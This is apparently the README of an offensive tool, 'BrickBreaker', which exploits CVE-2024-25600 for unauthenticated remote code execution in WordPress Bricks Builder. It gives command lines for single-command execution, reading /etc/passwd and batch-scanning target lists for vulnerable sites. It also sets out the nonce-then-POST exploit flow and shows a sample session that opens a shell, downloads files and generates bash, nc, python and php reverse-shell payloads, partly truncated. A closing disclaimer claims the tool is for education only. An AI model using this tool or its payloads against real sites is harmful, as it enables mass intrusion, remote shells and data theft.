Share
## https://sploitus.com/exploit?id=0CFB79ED-256D-56F3-8885-1C154C11057E
# ๐งฑ BrickBreaker



**WordPress Bricks Builder RCE Exploit**
*Unauthenticated Remote Code Execution with Stable Interactive Shell*
[Features](#-features) โข
[Installation](#-installation) โข
[Usage](#-usage) โข
[Shell Commands](#-shell-commands) โข
[Technical Details](#-technical-details)
---
## โจ Features
| Feature | Description |
|---------|-------------|
| ๐ฅ **Multiple Payloads** | `code`, `container`, `carousel` payload types |
| ๐ **Interactive Shell** | PTY-like experience with rich formatting |
| ๐ **File Operations** | Upload/download files via base64 encoding |
| ๐ **Reverse Shell** | Built-in reverse shell payload generator |
| ๐จ **Rich Output** | Beautiful colored terminal with progress indicators |
| ๐ **Batch Scanner** | Scan multiple targets from file |
| โก **Fast & Reliable** | HTTP connection pooling with httpx |
---
## ๐ฆ Installation
### Requirements
- Python 3.8+
- pip
### Quick Install
```bash
# Clone repository
git clone https://github.com/yourusername/brickbreaker.git
cd brickbreaker
# Install dependencies
pip install -r requirements.txt
```
### Manual Install
```bash
pip install httpx rich
```
---
## ๐ Usage
### Basic Usage
```bash
# Interactive shell (most common)
python3 brickbreaker.py https://target.com
# Auto-detect HTTPS
python3 brickbreaker.py target.com
```
### Single Command Execution
```bash
# Execute one command and exit
python3 brickbreaker.py https://target.com -c "id"
python3 brickbreaker.py https://target.com -c "cat /etc/passwd"
python3 brickbreaker.py https://target.com -c "ls -la /var/www/html"
```
### Different Payload Types
```bash
# Default: code payload
python3 brickbreaker.py https://target.com
# Container payload (alternative)
python3 brickbreaker.py https://target.com -p container
# Carousel payload (another alternative)
python3 brickbreaker.py https://target.com -p carousel
```
### Batch Scanning
```bash
# Scan multiple targets
python3 brickbreaker.py --scan targets.txt
# Save vulnerable URLs to file
python3 brickbreaker.py --scan targets.txt -o vulnerable.txt
```
### All Options
```
python3 brickbreaker.py -h
usage: brickbreaker.py [-h] [-c COMMAND] [-p {code,container,carousel}]
[-t TIMEOUT] [-q] [--scan FILE] [-o OUTPUT] [-v]
[url]
CVE-2024-25600 - WordPress Bricks Builder RCE Exploit
positional arguments:
url Target URL
optional arguments:
-h, --help show this help message and exit
-c, --command Execute single command
-p, --payload Payload type (default: code)
-t, --timeout Request timeout (default: 30)
-q, --quiet Minimal output
--scan FILE Batch scan URLs from file
-o, --output Save vulnerable URLs to file
-v, --version Show version
```
---
## ๐ Shell Commands
Once inside the interactive shell:
| Command | Description |
|---------|-------------|
| `help` | Show available commands |
| `info` | Display session information (user, kernel, IP, etc.) |
| `clear` | Clear the terminal screen |
| `download ` | Download file from target to local machine |
| `upload ` | Upload local file to target's `/tmp/` |
| `revshell` | Generate and execute reverse shell payloads |
| `exit` | Close the session |
### Example Session
```
โโโโโโโ โโโโโโโ โโโ โโโโโโโโโโ โโโ โโโโโโโ โโโโโโโ โโโโโโโโ โโโโโโ โโโ โโโโโโโโโโโโโโโโโโ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ โโโโ โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ โโโโโโโโโโโโโโโโโโโโ
โโโโโโโโโโโโโโโโโโโโโโ โโโโโโโ โโโโโโโโโโโโโโโโโโโโโโ โโโโโโโโโโโโโโโ โโโโโโ โโโโโโโโ
โโโโโโโโโโโโโโโโโโโโโโ โโโโโโโ โโโโโโโโโโโโโโโโโโโโโโ โโโโโโโโโโโโโโโ โโโโโโ โโโโโโโโ
โโโโโโโโโโโ โโโโโโโโโโโโโโโโโ โโโ โโโโโโโโโโโ โโโโโโโโโโโโโโ โโโโโโ โโโโโโโโโโโโโโ โโโ
โโโโโโโ โโโ โโโโโโ โโโโโโโโโโ โโโ โโโโโโโ โโโ โโโโโโโโโโโโโโ โโโโโโ โโโโโโโโโโโโโโ โโโ
CVE-2024-25600 | RCE Exploit | v2.1.0
โ Nonce found: 0aed3bea03
โ Target is VULNERABLE to CVE-2024-25600
User: apache | Host: bricks
โญโ ๐ BrickBreaker Shell โโฎ
โ Shell established! โ
โ User: apache โ
โ Host: bricks โ
โ Type 'help' for commands โ
โฐโโโโโโโโโโโโโโโโโโโโโโโโโโโฏ
apache@bricks:/var/www/html$ id
uid=48(apache) gid=48(apache) groups=48(apache)
apache@bricks:/var/www/html$ info
โญโโโโโโโโโโโ Session Info โโโโโโโโโโโโฎ
โ Property โ Value โ
โโโโโโโโโโโโโโโโผโโโโโโโโโโโโโโโโโโโโโโค
โ Target โ https://bricks.thm โ
โ User โ apache โ
โ Hostname โ bricks โ
โ Kernel โ 5.4.0-1029-aws โ
โ IP Address โ 10.82.149.50 โ
โ Working Dir โ /var/www/html โ
โ Nonce โ 0aed3bea03 โ
โ Payload โ code โ
โฐโโโโโโโโโโโโโโโดโโโโโโโโโโโโโโโโโโโโโโฏ
apache@bricks:/var/www/html$ download /etc/passwd
โ Downloaded: passwd (1847 bytes)
apache@bricks:/var/www/html$ revshell
Your IP: 10.10.10.10
Your Port [4444]: 4444
โญโโโโโโโโโโโ Reverse Shells โโโโโโโโโโโโฎ
โ Type โ Payload โ
โโโโโโโโโโผโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโค
โ bash โ bash -c "bash -i >& /dev/... โ
โ python โ python3 -c 'import socket... โ
โ nc โ rm /tmp/f;mkfifo /tmp/f;c... โ
โ php โ php -r '$s=fsockopen("10....โ
โฐโโโโโโโโโดโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโฏ
Execute which? [bash/python/nc/php/none]:
```
---
## ๐ง Technical Details
### Vulnerability Information
| Property | Value |
|----------|-------|
| **CVE ID** | CVE-2024-25600 |
| **CVSS Score** | 9.8 (Critical) |
| **Type** | Unauthenticated Remote Code Execution |
| **Affected** | Bricks Builder โค 1.9.6 |
| **Patched** | Bricks Builder 1.9.6.1+ |
### Root Cause
The vulnerability exists in the `Bricks\Query` class, specifically in the `prepare_query_vars_from_settings` method. User-controlled input from the `queryEditor` parameter is passed directly to PHP's `eval()` function without proper sanitization.
### Exploit Flow
```
1. Fetch nonce from target homepage (exposed in bricksData JS object)
2. Send POST request to /wp-json/bricks/v1/render_element
3. Payload executes via eval() in prepare_query_vars_from_settings
4. Command output returned in Exception message
```
### Payload Types
| Type | Method | Best For |
|------|--------|----------|
| `code` | PHP code block execution | Most reliable, default |
| `container` | Loop query injection | Alternative if code fails |
| `carousel` | Carousel query injection | Another alternative |
---
## โ ๏ธ Disclaimer
```
THIS TOOL IS PROVIDED FOR EDUCATIONAL AND AUTHORIZED SECURITY TESTING ONLY.
Unauthorized access to computer systems is illegal. Always obtain proper
authorization before testing. The author is not responsible for any misuse
or damage caused by this tool.
```
---
## ๐ References
- [CVE-2024-25600 - NVD](https://nvd.nist.gov/vuln/detail/CVE-2024-25600)
- [Original Disclosure - Snicco](https://snicco.io/vulnerability-disclosure/bricks/unauthenticated-rce-in-bricks-1-9-6)
- [Bricks Builder](https://bricksbuilder.io/)
---
## ๐ Credits
- Original vulnerability discovery: [Snicco Security](https://snicco.io)
- Exploit inspiration: [Chocapikk](https://github.com/Chocapikk/CVE-2024-25600)